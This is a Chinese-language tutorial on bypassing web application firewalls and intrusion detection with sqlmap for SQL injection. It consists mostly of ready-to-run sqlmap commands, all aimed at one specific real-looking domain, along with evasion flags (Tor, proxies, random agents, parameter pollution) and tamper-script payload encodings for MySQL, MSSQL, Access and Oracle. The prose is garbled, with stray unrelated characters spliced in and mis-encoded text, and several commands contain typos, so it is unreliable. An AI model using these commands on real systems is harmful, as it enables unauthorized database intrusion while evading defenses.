使用sqlmap 繞過防火墻進(jìn)行注入測試

0x00 前言

? ?現(xiàn)在的網(wǎng)絡(luò)環(huán)境往往是WAF/IPS/IDS保護(hù)著Web 服務(wù)器等等苇倡，這種保護(hù)措施往往會過濾擋住我們的SQL注入查詢鏈接，甚至封鎖我們的主機(jī)IP贡羔，所以這個時候孤澎，我們就要考慮怎樣進(jìn)行繞過，達(dá)到注入的目標(biāo)促脉。因?yàn)楝F(xiàn)在WAF/IPS/IDS都把sqlmap 列入黑名單了，呵呵策州！但是本文基于sqlmap 進(jìn)行繞過注入測試瘸味，介紹至今仍然實(shí)用有效的技巧，以下策略在特定的環(huán)境能夠成功繞過够挂，具體是否繞過硫戈，請仔細(xì)查看輸出的信息。

0x01 確認(rèn)WAF

? ? ?首先我們判斷該Web 服務(wù)器是否被WAF/IPS/IDS保護(hù)著下硕。這點(diǎn)很容易實(shí)現(xiàn)，因?yàn)槲覀冊诼呋蛘呤褂脤ｉT工具來檢測是否有WAF汁胆，這個檢測梭姓，在nmap 的NSE，或者WVS的策略或者APPSCAN的策略中都有嫩码，我們可以利用這些來判斷誉尖。在此我們，也介紹使用sqlmap 進(jìn)行檢測是否有WAF/IPS/IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首選

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10??--check-waf#備選

0x02 使用參數(shù)進(jìn)行繞過

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent?-v 2?#使用任意瀏覽器進(jìn)行繞過铸题，尤其是在WAF配置不當(dāng)?shù)臅r候

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 參數(shù)污染進(jìn)行繞過铡恕，尤其是在ASP.NET/IIS 平臺上

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"?--delay=3.5?--time-sec=60?#使用長的延時來避免觸發(fā)WAF的機(jī)制，這方式比較耗時

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"?--proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理進(jìn)行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"?--ignore-proxy#禁止使用系統(tǒng)的代理丢间，直接連接進(jìn)行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#清空會話探熔，重構(gòu)注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#或者使用參數(shù) --no-cast ，進(jìn)行字符碼轉(zhuǎn)換

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--mobile #對移動端的服務(wù)器進(jìn)行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"?--tor # 匿名注入

0x03 使用腳本介紹

1 使用格式：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#腳本A烘挫，腳本B?

2 腳本總類

01 apostrophemask.py#用utf8代替引號诀艰；Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

02?equaltolike.py#MSSQL * SQLite中l(wèi)ike 代替等號；Example: ?Input: SELECT * FROM users WHERE id=1 ；Output: SELECT * FROM users WHERE id LIKE 1

03?greatest.py#MySQL中繞過過濾’>’ ,用GREATEST替換大于號其垄；Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

04 space2hash.py#空格替換為#號隨機(jī)字符串以及換行符苛蒲；Input: 1 AND 9227=9227；Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

05?apostrophenullencode.py#MySQL 4, 5.0 and 5.5绿满，Oracle 10g臂外，PostgreSQL繞過過濾雙引號，替換字符和雙引號喇颁；

06 halfversionedmorekeywords.py#當(dāng)數(shù)據(jù)庫為mysql時繞過防火墻漏健，每個關(guān)鍵字之前添加mysql版本評論；

07?space2morehash.py#MySQL中空格替換為 #號以及更多隨機(jī)字符串換行符无牵；

08?appendnullbyte.py#Microsoft Access在有效負(fù)荷結(jié)束位置加載零字節(jié)字符編碼漾肮；Example: ('1 AND 1=1') '1 AND 1=1%00'

09?ifnull2ifisnull.py#MySQL，SQLite (possibly)茎毁，SAP MaxDB繞過對 IFNULL 過濾克懊。替換類似’IFNULL(A, B)’為’IF(ISNULL(A), B, A)’

10?space2mssqlblank.py(mssql)#mssql空格替換為其它空符號

11base64encode.py#用base64編碼j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12?space2mssqlhash.py#mssql查詢中替換空格

13?modsecurityversioned.py#(mysql中過濾空格，包含完整的查詢版本注釋;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

14?space2mysqlblank.py#(mysql中空格替換其它空白符號

15?between.py#MS SQL 2005七蜘，MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替換大于號（>）

16?space2mysqldash.py#MySQL谭溉，MSSQL替換空格字符（”）（’ – ‘）后跟一個破折號注釋一個新行（’ n’）

17?multiplespaces.py#圍繞SQL關(guān)鍵字添加多個空格；Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

18?space2plus.py#用+替換空格橡卤；Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

19?bluecoat.py#MySQL 5.1, SGOS代替空格字符后與一個有效的隨機(jī)空白字符的SQL語句扮念。然后替換=為like

20?nonrecursivereplacement.py#雙重查詢語句。取代predefined SQL關(guān)鍵字with表示 suitable for替代（例如 .replace（“SELECT”碧库、””)） filters

21?space2randomblank.py#代替空格字符（“”）從一個隨機(jī)的空白字符可選字符的有效集

22?sp_password.py#追加sp_password’從DBMS日志的自動模糊處理的26 有效載荷的末尾

23?chardoubleencode.py#雙url編碼(不處理以編碼的)

24?unionalltounion.py#替換UNION ALL SELECT UNION SELECT柜与；Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25?charencode.py#Microsoft SQL Server 2005，MySQL 4, 5.0 and 5.5嵌灰，Oracle 10g弄匕，PostgreSQL 8.3, 8.4, 9.0url編碼；

26?randomcase.py#Microsoft SQL Server 2005沽瞭，MySQL 4, 5.0 and 5.5迁匠，Oracle 10g，PostgreSQL 8.3, 8.4, 9.0中隨機(jī)大小寫

27?unmagicquotes.py#寬字符繞過 GPC addslashes驹溃；Example:?* Input: 1′ AND 1=1?* Output: 1%bf%27 AND 1=1–%20

28?randomcomments.py#用/**/分割sql關(guān)鍵字城丧；Example:‘INSERT’ becomes ‘IN//S//ERT’

29?charunicodeencode.py#ASP，ASP.NET中字符串 unicode 編碼豌鹤；

30?securesphere.py#追加特制的字符串亡哄；Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

31?versionedmorekeywords.py#MySQL >= 5.1.13注釋繞過

32?space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33?halfversionedmorekeywords.py#MySQL < 5.1中關(guān)鍵字前加注釋

0x04腳本參數(shù)組合策略繞過

1 mysql繞過：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2?-delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp? --tamper=space2mysqldash.p,versionedmorekeywords.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?-delay=3.5 ?----user-agent="?Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

備注：這些組合策略可以根據(jù)注入的反饋信息，及時調(diào)整組合策略

2 MSSQL：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?-delay=3.5 ?----user-agent="?Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--delay=3.5 --hpp --tamper=space2comment.py,randomcase.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--delay=3.5 --time-sec=120 ?--tamper=space2mssqlblank.py,securesphere.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--delay=3.5 --tamper=unionalltounion.py,base64encode.p

3 ms access:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--delay=3.5 --random-agent ?--tamper=appendnullbyte.py,space2plus.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--delay=3.5 --random-agent --hpp ?--tamper=chardoubleencode.py

4?Oracle：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--delay=5 --random-agent --hpp?--tamper=unmagicquotes.py,unionalltounion.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" ?--delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0”?--hpp?--tamper=charunicodeencode.py,chardoubleencode.py

5 建議：

? ? ? 因?yàn)閃AF可能采用白名單規(guī)則布疙，所以對于選擇哪種策略磺平，重點(diǎn)是根據(jù)-v 3 提示的信息進(jìn)行判斷魂仍，可以抓取主流的瀏覽器的user-agent ,s適當(dāng)?shù)难訒r，加上注入字符轉(zhuǎn)換---大小寫拣挪、空格擦酌、字符串、注釋菠劝、加密等等方式

? ? ? 鑒于參數(shù)和32種腳本赊舶，在我們平時的注入，這些通過不同的多重組合來進(jìn)行測試赶诊，這個測試或者比較耗時